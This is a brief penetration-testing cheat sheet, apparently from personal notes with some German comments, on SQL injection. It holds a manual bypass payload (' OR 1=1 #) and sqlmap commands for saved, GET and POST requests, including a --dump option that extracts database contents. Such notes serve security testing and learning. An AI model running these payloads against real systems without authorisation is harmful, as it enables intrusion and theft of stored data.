SQL injection

Manual

' OR 1=1 #

SQLmap

sqlmap -r ../request.txt --dbms=mysql --dump --output-dir=.

request.txt --> gespeicherter Request von z.B Burp

get-request example

sqlmap -u "http://example.com/?a=1&b=2&c=3" -p "a,b"

-p --> Testable parameter

post-request example

sqlmap -u "http://example.com/" --data "a=1&b=2&c=3" -p "a,b" --method POST

-p --> Testable parameter

Last updated